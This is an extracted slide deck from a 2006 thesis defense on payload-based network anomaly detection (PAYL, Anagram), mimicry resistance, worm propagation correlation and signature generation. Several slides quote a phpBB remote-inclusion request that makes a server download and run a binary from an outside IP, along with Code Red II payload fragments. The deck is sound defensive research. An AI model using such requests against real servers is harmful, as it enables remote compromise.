Network Payload-based Anomaly Detection and Content-based Alert Correlation

Network Payload-based Anomaly Detection and Content-based Alert Correlation

Network Payload-based Anomaly Detection and Content-based Alert Correlation Ke Wang Thesis Defense Aug. 14th, 2006 Department of Computer Science Columbia University 1 Why do we need payload-based anomaly detection Attacks that are normal connections may carry bad (anomalous) content indicative of a new exploit Slow and stealthy, or targeted/hitlist worms do not display loud and obvious scanning or propagation

behavior detectable via flow statistics This sensor augments other sensors and enriches the view of the network 2 Conjecture and Goal Detect Zero-Day Exploits via Content Analysis True Zero-day will manifest as never before seen data delivered to an application or server Learn typical/normal data, detect abnormal data Generate signature immediately to stop further propagation

Worms propagation detectable via flow statistics (except perhaps slow worms) Targeted Attacks (sophisticated, stealthy, no loud and obvious propagation) No need to wait until payload prevalence (a sufficient number of repeated occurrences of the same content) Develop sensors that are accurate, efficient, scalable, with resiliency to mimicry attacks 3 Contributions Demonstrate the usefulness of analyzing network payload for anomaly detection

PAYL: 1-gram modeling Anagram: higher order n-gram modeling Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation attempt Efficient privacy-preserving payload correlation across sites, and automatic signature generation 4 Contributions Demonstrate the usefulness of analyzing network payload for anomaly detection PAYL: 1-gram modeling

Statistical, semantics/language-independent, efficient Incremental learning Clustering for space saving Multi-centroids fine grained modeling Anagram: higher order n-gram modeling Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation attempt Efficient privacy-preserving payload correlation across sites 5 Motivation of PAYL

Content traffic to different ports have very different payload distributions Within one port, packets with different lengths also have different payload distributions Furthermore, worm/virus payloads usually are quite different from normal distributions Previous work: Attack signature: Snort, Bro First few bytes of a packet: NATE, PHAD, ALAD Service-specific IDS [CKrugel02]: coarse modeling, 256 ASCII characters in 6 groups. 6

Example byte distributions for different ports ssh Mail Web Dest Port 22 Dest Port 25 Dest Port 80 Src Port 22 Src Port 25 Src Port 80 7 Example byte distribution for different payload lengths of port 80 on the same host server

8 CR II distribution versus a normal distribution 9 How to model normal content: 1-gram Centroid The average relative frequency of each byte, and the standard deviation of the frequency of each byte, for payload length 185 of port 80 10 PAYL operation Learning phase

Clustering: merge two neighbouring centroids if their Manhattan distance is smaller than threshold Save space, remove redundancy, linear time computation Improve the modeling accuracy for those length bins with few training data (sparseness) Self-calibration phase Models are computed from packet stream incrementally conditioned on port/service and length of packet Hands-free epoch-based training Fine-grained multi-centroids modeling

Sampled training data sets an initial threshold setting Detection phase Packets are compared against models using simplified Mahalanobis distance 11 Performance comparison: single centroid vs. multicentroids Test Worms: CR, CRII, WebDAV, and nsiislog.dll buffer overflow vulnerability (MS03-022) Singlecentroid Multicentroids (one-pass) Dataset W 0.66% Dataset

W1 0.487% Dataset EX 0.982% 0.42% 0.225% 0.32% Multi0.0086% 0.029% 0.107% centroids At 0.1% false positive rate: 5.8 alerts/h for EX, 6 (semialerts/h for W, 8 alerts/h for W1 12 PAYL Summary

Models: length conditioned character frequency distribution (1-gram) and standard deviation of normal traffic Testing: Mahalanobis distance of the test packet against the model Pro: Simple, fast, memory efficient Con: Cannot capture attacks displaying normal byte distribution Easily fooled by mimicry attacks with proper padding

13 Example: phpBB forum attack GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://;wget%20216.15.209.4/ criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/ 1.1.Host:. (compatible;.MSIE.6.0;.Windows.NT.5.1;).. Relatively normal byte distribution, so PAYL misses it Abnormal sequence of commands for exploitation The attack invariants The subsequence of new, distinct bye values should be malicious

What we need: capture order dependence of byte sequences --- higher order n-grams modeling 14 Contributions Demonstrate the usefulness of analyzing network payload for anomaly detection PAYL: 1-gram modeling Anagram: higher order n-gram modeling

Binary-based modeling Bloom filter for space efficiency Semi-supervised learning Privacy-preserving payload alert for correlation Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation attempt Efficient privacy-preserving payload correlation across sites 15 Overview of Anagram Binary-base higher order n-grams modeling Models all the distinct n-grams appearing in the normal training data During test, compute the percentage of neverseen distinct n-grams out of the total n-grams in a packet: Score

Semi-supervised learning N new [0,1] T Normal traffic is modeled Prior known malicious traffic is modeled: Snort Rules, captured malcode Model is space-efficient by using Bloom filters Previous work Foreign system call sequences [Forrest96]

Trie-based n-gram storage and comparison for network anomaly detection [Rieck06] 16 17 18 False positive rate (with 100% detection rate) with different training time and n of n-grams Normal traffic: real web traffic collected of two CUCS web servers False Positive Rate (%) when 100% Detection Rate Test worms: CR, CRII, WebDAV, Mirela, phpBB forum attack, nsiislog.dll buffer overflow(MS03-022) 3-grams 5-grams 7-grams 0.03

0.025 0.02 0.015 0.01 0.005 0 0 1 2 3 4 5 Training Dataset Length (in days)

6 7 Low False positive rate per packet (better per flow) No significant gain after 4 days training Higher order n-grams needs longer training time to build good model 3-grams are not long enough to distinguish malicious byte sequences from normal ones 19 False Postitive Rate (%) when 100% Detection Rate The false positive rate (with 100% detection rate) for different n-grams, under both normal and semi-supervised training per packet rate

0.035 0.03 dataset www1-06, normal dataset www1-06, supervised dataset www-06, normal dataset www-06, supervised 0.025 0.02 0.015 0.01 0.005 0 2 3 4 5 6 7

8 9 Value n of n-grams 20 Mimicry attacks Attackers can mimic the normal traffic and hide the exploit inside the sled to avoid the sensor easily. Example: polymorphic mimicry worm developed by [OK05] targeting PAYL, which do encoding and traffic blending to simulate normal profile. 21 Contributions

Demonstrate the usefulness of analyzing network payload for anomaly detection Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation attempt Efficient privacy-preserving payload correlation across sites 22 Randomization against mimicry attacks

The general idea of payload-based mimicry attacks is by crafting small pieces of exploit code with a large amount of normal padding to make the whole packet look normal. If we randomly choose the payload portion for modeling/testing, the attacker would not know precisely which byte positions it may have to pad to appear normal; harder to hide the exploit code! This is a general technique can be used for both PAYL and Anagram, or any other payload anomaly detector. For Anagram, additional randomization, keep ngram size a secret! 23 Randomized Modeling Separate the whole packet randomly into

several (possibly interleaved) substrings or subsequences: S1, S2, ..SN, and build one model for each of them Test packets payload is divided accordingly 24 Shortcomings : Models from sub-partitions may be similar Higher memory consumption, no real model diversity The testing partitioning need to be the same as training partitioning Less flexibility Need to retrain when wants to change partitions Top plot is the model built from the whole packet, and the bottom two are the models built from two random subpartitions.

25 Randomized Testing Simpler strategy that does not incur substantial overhead Build one model for whole packet, randomize tested portions Separate the whole packet randomly into several (possibly interleaved) partitions: S1, S2, ..SN, Score each randomly chosen partition Score max N i new / Ti separately Use the maximum score: 26 27

PAYL Test: on the mimicry attack designed by [OK05] targeting it, 20 fold randomized testing Pure random mask Chunked random mask Detecti Avg. FP Std. FP on Times 16/20 0.269% 0.375% 14/20 0.175% 0.409% 28 Anagram Test:

average false positive rate and standard deviation with 100% detection rate, chunked random mask, 10 fold randomized testing Normal training Semi-supervised training 29 Contributions Demonstrate the usefulness of analyzing network payload for anomaly detection Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation

attempt Detect slow or stealthy worms Immediate signature generation Efficient privacy-preserving payload correlation across sites. 30 Ingress/egress correlation to detect worms propagation Observation

An approach to stop the worms very first propagation attempt Self-propagating worms will start attacking other machines (by sending at least the exploit portion of its content) shortly after a host is infected The attacked destination port will be the same since its exploiting the same vulnerability If we detect anomalous egress packets to port i very similar to those anomalous ingress packets to port i, there is a high probability that a worm has started its propagation Advantage: Can detect slow or stealthy worms which wont show probe behavior and thus avoid probe detectors 31

Similarity metrics to compare the payloads of two or more anomalous packet alerts Metric Data used Handle fragment Similarity score [0, 1] Detect metamorphic String equality (SE) Raw data No No Longest common substring (LCS)

Raw data Yes 1 for equal, 0 otherwise 2*C/( L1+ L2) Longest common subsequence (LCSeq) Raw data Yes 2*C/( L1+ L2) Some Experiment result No 32 LCS signature generation:

Code Red II |d0|[email protected]|0 ff|5|d0|[email protected]|0|h|d0| @|0|j|1|j|0|U|ff| 5|d8|[email protected]|0 e8 19 0 0 0 c3 ff|%`[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%[email protected]|0 ff|%| [email protected]|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 0 0 0 0 0 0 0 0 0 0 0 0 0|\EXP LORER.EXE|0 0 0|SOFTWARE\Microsoft\Windows NT \CurrentVersion\Winlogon|0 0 0|SFCDisable|0 0 9d ff ff ff|SYSTEM\CurrentControlSet\Service s\W3SVC\Parameters\Virtual Roots|0 0 0 0|/Scr ipts|0 0 0 0|/MSADC|0 0|/C|0 0|/D|0 0|c:\,,21 7|0 0 0 0|d:\,,217|fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc 33 Previous Work Worm signature generation: Autograph, Earlybird, Honeycomb, Polygraph, Hasma Detecting frequently occurring payload substrings or tokens from suspicious IP, which still depends on the scanning

behavior Detection occurs some time after the worm propagation Cannot detect slow and stealthy worms 34 Contributions Demonstrate the usefulness of analyzing network payload for anomaly detection Randomized modeling/testing that can help thwart mimicry attacks Ingress/egress payload correlation to capture a worms initial propagation attempt Efficient privacy-preserving

payload correlation across sites Robust and privacy-preserving means of representing content-based alerts. Automatic signature generation. 35 Cross-site payload alert correlation Each site has a distinct content flow Find global, common invariants in content.

If multiple sites see the same/similar content alerts, its highly likely to be a true worm/targeted outbreak Separate TPs from FPs! The False False Positive Problem Reduces false positives by creating white lists of those alerts that cannot be correlated Higher standard to prevent mimicry attack Diversity via content (not system or software) Exploit writers/attackers have to learn the distinct content traffic patterns of many different sites Need to be privacy-preserving 36

Related Research DNAD/Worminator (slow/IP) sharing Domino alert sharing The model for content sharing and querying Could also serve as a trap to detect attacker watermarking behavior PeerPressure, Privacy-Preserving friends troubleshooting network 37 Correlation techniques Baseline

Raw suspect content string-based correlation: String equality (SE), longest common substring (LCS), longest common subsequence (LCSeq), edit distance (ED) Frequency-modeled 1-gram correlation Frequency distribution: Manhattan distance Z-String: supports SE, LCS, LCSeq, ED Binary-modeled n-gram correlation N-gram signature, Bloom filter n-gram signature 38 Example suspect content This is a bot command string

Original content: 256 bits. Thi, sa, ot, mma, st, his, a, tc, man, str, is, ab, co, and, tri, si, bo, com, nd, rin,

is, bot, omm, ds, ing Frequency distribution; the most frequent character is a space (ASCII code 32). Size 8160 bits. isamnotTbcdghr List of 3-grams in original string. A Z-String; the space (box) is the box represents a space; the most frequent character. Nonunderlined n-gram appears twice in appearing characters are the original alert. 25 n-grams take removed. approximately 600 bits. 15 characters = 120 bits. 0000011010101101001101100110101101010 01010011101010101111000

of above n-grams. If three hash values are used, a minimum optimal size 39 would Real traffic evaluation Goal: measure performance in identifying true alerts from false positives Mix the collection of attacks into two hours of traffic from www and www1 Ideal: true positives have very high similarity scores, while false positives have very low scores Multiple, differently-fragmented instances of Code Red and Code Red II to simulate a real worm attack

Mixed sets are run through PAYL and Anagram, with alerting threshold reduced so that 100% of attacks are detected, but with possibly higher FP rates String 40 Real traffic evaluation (II) Range of scores across multiple instances of the same worm (CR or CRII) Range of scores across instances of different worms (CR vs. CRII), e.g., polymorphism False positive score range; blue

bar represents 99.9% percentile; white represents maximum Methodsscore are, from 1 to 8: Raw-LCS, Raw-LCSeq, Raw-ED, Freq-MD, ZStr-LCS, ZStr-LCSeq, Zstr-ED, N-grams with n=5. 41 Real traffic evaluation (III) Correlation of identical (non-polymorphic) attacks works accurately for all techniques Non-fragmented attacks score near 1 Z-Strings (MD, LCseq, ED) and n-grams handle

fragmentation well Polymorphism is hard to detect; only RawLCSeq and n-grams score well Overall, n-grams are particularly effective at eliminating false positives, and Bloom filters enable privacy preservation 42 Signature Generation Each class of techniques can generate its own signature Raw packets: Exchange LCS/LCSeq Byte frequency/Z-Strings

Not privacy-preserving Given the frequency distribution, Z-Strings generated by ordering from most to least frequent and dropping the least frequent N-grams Robust to reordering or fragmentation If position information is available, can flatten into a deployable string signature 43 Signature/Query generation (II) GET./default.ida?XXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u 9090%u6858%ucbd3%u7801%u9090%u9090%u 8190%u00c3%u0003%u8b00%u531b%u53ff%u 0078%u0000%u0

Original CRII packet (first 300 bytes) 88 0 255 117 48 85 116 101 106 232 100 133 80 254 1 69 137 56 51 Z-String (first 20 bytes, ASCII values) Byte frequency distribution * /def*ult.ida?XXXX*XXXX%u9090% u6858%ucbd3%u7801%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7 801%u9090%u9090%u8190%u00c3%u00 03%u8b00%u531b%u53ff%u0078%u000 0%u00=a HT*: 3379 Flattened 5-grams (first 172 bytes; * implies wi 44 Accuracy of the signatures The accumulative frequency of the signature match scores computed by matching normal traffic against different worm signatures. The closer to the y-axis, the more accurate.

The six curves represent the following, in order from the left to the right: 1) n-grams signature, 2) Z-string signature comparing using LCS, 3) LCSeq of raw signature, 4) Z-string signature using LCSeq,45 Signature for polymorphic worm Our approaches work poor since they are based on payload similarity Will there be enough invariants for accurate signature? Slammer: first byte 0x04 CLET shellcode 2: \0xff\0xff\0xff and \0xeb\0x31. Proposed alternative: generalized signature

specifying the higher-level pattern of an attack, instead of raw payload based. 0xeb 0x31B {92 bytes, entropy: E, 0xff 0xff 0xffB} 46 Conclusions Network payload-based PAYL and Anagram can detect zero-day attacks with high accuracy and low false positives Randomization help thwart mimicry attack Ingress/egress correlation detects worms initial propagation and generate accurate worm signature

Good at detecting slow/stealth worms Privacy-preserving payload alerts correlation across sites can identify true anomalies and reduces false positive Accurate signature generation 47 Accomplishments Major papers:

Anagram: A Content Anomaly Detector Resistant to Mimicry Attack, K. Wang, J. Parekh, S. Stolfo, RAID, Sept 2006. Privacy-preserving Payload-based Correlation for Accurate Malicious Traffic Detection, J. Parekh, K. Wang, S. Stolfo, SIGCOMM LSAD Workshop, Sept, 2006. Anomalous Payload-based Worm Detection and Signature Generation, K. Wang, G. Cretu, S. Stolfo, RAID, Sept 2005. FLIPS: Hybrid Adaptive Intrusion Prevention, M. Locasto, K. Wang, A. Keromytis, S. Stolfo, RAID, Sept. 2005. Anomalous Payload-based Network Intrusion Detection, K. Wang, S. Stolfo, RAID, Sept 2004. Software implementation (licensed by Columbia): PAYL sensor Anagram sensor

48 Future Work Further Evaluation including measures/features of high-entropy partitions Optimization problem: model parameter settings (n-gram size, thresholds, etc.), random mask generation Real deployment of multiple-site correlation Shadow server architecture implementation and testing Pushing into the host: integration with instrumented application software 49

Thank you! Q/A ? 50 Backup slides 51 Overview of PAYL How it works Principles of operation Fine-grained modeling of normal payload

Normal packet content is automatically learned Based upon unsupervised anomaly detection algorithms Site and application specific, also conditioned on packet length Build byte frequency distribution and its standard deviation as normal profile For test data, compute the simplified Mahalanobis distance against its centroid to measure similarity 52 Unsupervised Anomaly Detection Core Technology Each site/host has a unique content flow that may be automatically learned

UAD Generates model over unlabeled data Model detects Computational Approach: Outlier Detection Anomalies in collected training data (Forensics) Anomalies in data stream (Detection) Two frameworks: geometric, probabilistic/statistical Several algorithms PAYL is based upon comparison of content statistical distributions Handles noise in data No guarantees of attack-free data Assumes most data is attack-free

Return to main 53 Epoch-based learning To determine how much training data is enough, or whether the model is ready for use An epoch is measured in terms of the number of packets analyzed, or by means of a time period The training phase is sufficiently complete if the model current computed has changed little for several continuous epochs Need to define model similarity measurements 54

Epoch-based learning: PAYL Metric 1: number of new centroids produced in the current epoch, Metric 2: Manhattan distance of each centroid to each nearest one computed in the prior epoch Return to main55 Epoch-based learning: Anagram The likelihood of seeing new n-grams, which is the percentage of the new distinct n-grams out of total n-grams in this epoch 0.01 Likelihood of seeing new n-grams 0.009 3-grams 5-grams

7-grams 0.008 0.007 0.006 0.005 0.004 0.003 0.002 0.001 0 0 50 100 150 200 250 300

Per 10000 content packets 350 400 450 56 The computed Mahalanobis distance of the normal and attack packets The normal datas distances are displayed as several bands, which illustrates that we might have multiple centroids for one length 57 Multiple centroids modeling for each length

Goal: build finer-grained models for the payload to detect anomalies more accurately Problems: Dont know how many clusters may exist Can only access each packet data once in sequence, cannot store them in memory So the traditional clustering algorithm like K-means, EM cannot be easily applied here Our solution One-pass online clustering Improvement: semi-batched one-pass clustering (keep a small buffer and do local optimal clustering) Back

58 Simplified Mahalanobis Distance Standard metric to compare two statistical distributions: 2 T 1 d ( x, y ) ( x y ) C ( x y ) Cij Cov ( yi , y j ) x is the test data, and y is its profile. When we assume each ASCII value is independent, the formula can be n 1 simplified: d ( x, y ) i 0 (| xi yi | / i )

Return to main59 Incremental Learning Average of N data: When the (N+1)th data arrives: N x i 1 xi N x N x N 1 x N 1 x x x N 1 N 1 For the standard deviation, we can rewrite it as the following: Var ( X ) E ( X EX ) 2 E ( X 2 ) ( EX ) 2 Therefore, we dont need to keep previous data to

update the new average and standard deviation Now each centroid stores only the average of x and x2 Return to main slides 60 Manhattan distance n Mdis ( x, y ) | xi yi | i 0 y x 6 Mdis ( x, y ) | xi yi | 23 i 1 61 Example of clustering across length bins Original centroids

Clustered centroids Return to main slides 62 Self-calibration Training data is sampled Use FIFO to keep the most recent samples to capture concept drift After training, compute the distances of samples against the centroid and set the anomalous threshold to the maximum At the start of the detection phase, increase the threshold by t% if the alert rate is higher than a user-specified parameter Return to main slides

63 One-pass online clustering algorithm while (more packets){ p = next packet; if ( p is similar to one of the existing centroids ) merge into that centroid else create a new centroid; use p as center if ( total number of centroids > MaxSize ) merge the two nearest ones } Problem: The incoming order of the packets affect the result Return to main slides 64 Continue merge ( c_set1, c_set2) { for (each c in c_set1){ if (c is similar to one of the centroids in c_set2) merge c into that centroid else

add c as a new centroid to c_set2 } if ( size of c_set2 > MaxNum) merge the two nearest ones until (size==MaxNum) } Return to main slides 65 Improvement: Semibatched one-pass clustering for stream processing Main idea: Store byte distributions of M packets Optimize aggregate clustering of the M packets Merge the resulting centroids into the existing centroids from prior batch of data Can ameliorate the problem of packet ordering The batch size M needs to be chosen properly: tradeoff of accuracy and memory consumption

66 One-pass clustering result. First six centroids for W dataset, length 1460 67 Semi-batch clustering result. First six centroids for W dataset, length 1460 Return to main slides 68 Performance

Training over 3 days of data, detection over 2 days Data from two web servers Training: 29 seconds (60 MBits/sec) Detection: 12 seconds (54 MBits/sec) FP Rate: 42 / 625595 packets (0.006%) Coverage: 20/30 known attacks in data detected 69 Bloom filter A Bloom filter (BF) is a one-way data structure that supports insert and verify operations, yet is fast and space-efficient Represented as a bit vector; bit b is set if hi(e) = b, where hi is a hash function and e is the

element in question No false negatives, although false positives are possible in a saturated BF via hash collisions; use multiple hash functions for robustness Each n-gram is a candidate element to be inserted or verified in the BF Bloom filters are also privacy-preserving, since ngrams cannot be extracted from the resulting bit vector 70 Return to 71 Anagram: semi-supervised learning Binary-based approach is simple and efficient, but too sensitive to noisy data Pre-compute a bad content model using snort rules and collection of worm samples, to supervise the learning

This model should match very few normal packets, while able to identify malicious traffic (often, new exploits reuse portions of old exploits) The model contains the distinct n-grams appearing in these malcode collections Use a small, clean dataset to exclude the normal n-grams appearing in the snort rules and virus. 72 Bad content model (purple part) N-grams in snort rules and collected malwares

N-grams in clean traffic 73 Distribution of bad content matching scores for normal packets (left) and attack packets (right). The matching score is the percentage of the ngrams of a packet that match the bad content model 0.25 1 0.9 Percentage of the packets Percentage of the packets 0.8 Normal Content Packets 0.7 0.6 0.5 0.4 0.3

0.2 Attack Packets 0.2 0.15 0.1 0.05 0.1 0 0 20 40 60 80 Bad Content Model Matching Score

100 0 0 20 40 60 80 100 Bad Content Model Matching Score 74 Use of bad content model Training: ignore possible malicious n-grams

Packets with a max number of N-grams matching the bad content model are ignored Packets with high matching score (>5%) ignored, since new attacks might reuse old exploit code. Ignoring few packets is harmless for training Testing: scoring separates malicious from normal If a never-seen n-gram also appears in the bad content model, give a higher weight factor t for it. (t=5 in our experiment) N new t * N new _ bad Score T Back

75 Feedback-based learning with shadow servers Training attacks: attacker sends malicious data during training time to poison the model. Bad content model cannot guarantee 100% detection The most reliable way is using the feedback of some host-based shadow server to supervise the training Also useful for adaptive learning to accommodate concept shifting PAYL/Anagram can be used as a first-line classifier to amortize the expensive cost of the shadow server

Only small percentage of the all traffic is sent to shadow server, instead of all The feedback of shadow server can be improve the accuracy of Anagram 76 Back 77 The structure of the mimicry worm 78 The maximum possible padding length for a packet of different varieties of this mimicry attack versio 418, 418, 730, 730, 730, 730,

n 10 100 10 10 100 100 Paddi 125 149 437 461 1167 1191 ng length Each cell in the top row contains a tuple (x, y), representing a variant sequence of y packets of x bytes each. The second row represents the maximum number of bytes that can be used for padding in each packet. Return to 79 Ingress/egress experimental setting

Launched CodeRed and CodeRed II in our controlled test environment, capture the traces, and merge the traces into a real web server's trace Simulate a real worm attacking and propagating on a real server Interesting behavior observed about the worm Propagation occurred with packets fragmented differently than the initial attack packets Multiple types of fragmentation 80 Different

fragmentation for CR and CRII Code Red (total 4039 bytes) Incoming Outgoing 1448, 1448, 1143 4, 13, 362, 91, 1460, 1460, 649 4, 375, 1460, 1460, 740 4, 13, 453, 1460, 1460, 649 Code Red II (total 3818 bytes) Incoming Outgoing 1448, 1448, 922 1460, 1460, 898 81 Results of correlation for different metrics

Metric Detect False propagati alerts on SE No No LCS(0.5) Yes No LCSeq(0. Yes No The 5) number in the parenthesis is the threshold setting for similarity score to decide whether a propagation has occurred Return to main 82 Data Diversity

Example byte distribution for payload length 536 of port 80 for the three sites. 83 PAYL: for each pair of sites, the 3 packet lengths with the largest Manhattan distance between their byte distribution. 1448, 1460, 216, EX, W 0.7896 0.7851 0.6241 1460, 1448, 536, EX, W1 0.9746 0.8731 0.5540 892, 1460, 1448, Anagram: the number of unique 5-grams in

W, W 0.7502 0.7456 0.7122 dataset W, W1 and EX, and the common 5-grams numbers between each pair of sites. Common Common Dataset Dataset A B 5-grams Perc(%) EX (509347) W (953345) 129468 17.5% EX (509347)

W1 (974292) 99366 13.4% 84 Bac Testing methodology Three sets of traffic Arranged into three sets of pairs

www1 and www2: Columbia webservers, 100 packets each Malicious packet dataset, 56 packets each Known Ground Truth 10,000 good vs. good 1,540 bad vs. bad 5,600 good vs. bad between www1 and the malicious dataset Compare Similarity of the approaches Effectiveness in correlating Ability to generate signatures 85 Similarity direct string comparison

1 0.9 0.8 Manhattan Distance Similarity Score 0.7 0.6 Raw ED 0.5 Zstr ED 0.4 Raw LCSeq 0.3

Zstr LCSeq 0.2 Raw LCS 0.1 0 Zstr LCS 0 10 20 30 40 50

60 70 Similarity score, 80 random pairs of good vs. good 80 High-level view of score similarities Most of the techniques are similar, except LCS (vulnerable to slight differences) ED and LCSeq very similar N-gram techniques not included (doesnt compute similarity over entire packet datagram) Detail

Comparison Bac 86 Similarity comparison (II) To compare the difference more precisely, normalize and compare scores Compute similarity score vectors VA , VB Match their medians Scale ranges proportionally so min and max values match Manhattan distance then computed between the vectors

Each privacy-enabled technique compared against Raw-LCSeq (baseline) 87 Similarity of packets (III) Type Raw- RawLCS ED MD ZStr- ZStr- ZStrLCS LCSe ED q G-D .094 .033 .066 .207 .079 .066 8 6 9 9 4 7 B-B .050 .044 .065 .039 .026 .066 Normalized similarity scores (lower is better) 8 1

3 9 3 9 Unsurprisingly, Raw-ED closest to Raw-LCSeq .025 .024 .011 .031 .019when .023 G-B All privacy-preserving methods are close 1 0 attack0traffic;1may be3 correlating1pairs including leveraging difference between byte distributions Manhattan distance between packet freq distributions best Bac 88


The anomalous n-grams of suspicious payload are stored in a Bloom filter, and exchanged among sites By checking the n-grams of local alerts against the Bloom filter alert, its easy to tell how similar the alerts are to each other The common malicious n-grams can be used for general signature generation, even for polymorphic worms Privacy preserving with no loss of accuracy 90 Robust Signature Generation

Anagram not only detects suspicious packets, it also identifies the corresponding malicious n-grams! These n-grams are good targets for further analysis and signature generation The set of n-grams is orderindependent. Attack vector reordering will fail. 91 Anagram flattened signature for attack php attack content: GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://;wget%20216.15.209.4/criman;chmod %20744%20criman;./criman;echo%20YYY;echo|..HTTP/ 1.1.Host:. (compatible;.MSIE.6.0;.Windows.NT.5.1;)..

Generated signatures using different N: N=3: *?ph*bb_*//8*p;wg*n;c*n;./c*n;ec*0YYY;echo|H*26.U*1;).* N=5: *ums/ad*in/admin_sty*.phpadmin_sty*hp?phpbb_root_path= cmd*cmd=cd%20/tmp;wget%20216*09.4/criman;chmod%20744%20criman;./ criman;echo%20YYY;echo| HTT*6.26.Use*5.1;)..* N=7: *dules/Forums/admin/admin_styles.phpadmin_styles.php? phpbb_root_path=*?&cmd=cd%20/tmp;wget %20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/*59.16.26.User-*T 5.1;)..* Note: . for nonprintable characters; * represents a wildcard for signature matching 92

Recently Viewed Presentations

  • Todays Title. Todays Date To Assess my Understanding

    Todays Title. Todays Date To Assess my Understanding

    Scale Drawings, Maps and Plans. I can draw and measure lines accurately. I can work out 'real life' dimensions from a simple plan. I can draw an accurate plan when I am told what scale to use. I can decide...
  • Best Practice in Designing Effective e-Courseware for ...

    Best Practice in Designing Effective e-Courseware for ...

    Best Practice in Designing Effective e-Courseware for Deployment with an LMS Partnership for Higher Education in Africa: Education Technology Initiative
  • The Windmills Project In this talk :  Motivations

    The Windmills Project In this talk : Motivations

    The Windmills Project In this talk : Motivations and description Measurements and analysis plan An example: sea microseism at Virgo I Fiori - ILIAS WG1 meeting - Cascina - June 14, 2005
  • How to Conduct a Survey - Georgia Department of Community Affairs

    How to Conduct a Survey - Georgia Department of Community Affairs

    If a survey (100% or random) is used, DCA-6 must include: Description of how the # of households was determined. Description of how sample was selected. Describe a random sample method (if applicable) See Appendix C for guidance . Description...
  • Tans lecture - isigrowth

    Tans lecture - isigrowth

    While this has offered growth expansion opportunities to firms thanks to rising income inequality in developed and emerging economies, it is economically unsustainable: search on the part of the business community in the absence of Keynesian global redistribution policies for...
  • Text Types (Sabatini) Group 1 - Roma Tre University

    Text Types (Sabatini) Group 1 - Roma Tre University

    Text Types (Sabatini) Group 2 expository and didactic texts popularising informative texts (e.g. textbooks on social, historical,political topics, popularising texts of various topics,newspaper and magazine articles) Text Types (Sabatini) Group 3 literary texts, both poetry and fiction.
  • Traditional Folktales - WELCOME TO MRS. MICHELLE'S ESL CLASSES

    Traditional Folktales - WELCOME TO MRS. MICHELLE'S ESL CLASSES

    How much folklore is transmitted through schools? Do you think schools should make a point of transmitting folklore or is that the responsibility of each family? Can you think of any traditional proverbs or sayings from your country? Do you...
  • Report Writingand Reflective Writing - De Montfort University

    Report Writingand Reflective Writing - De Montfort University

    Report Writingand Reflective Writing. Centre for Learning and Study Support (CLaSS) ... Keep an eye out on blackboard and MyDMU to see our upcoming sessions. ... De Montfort University Library Services ...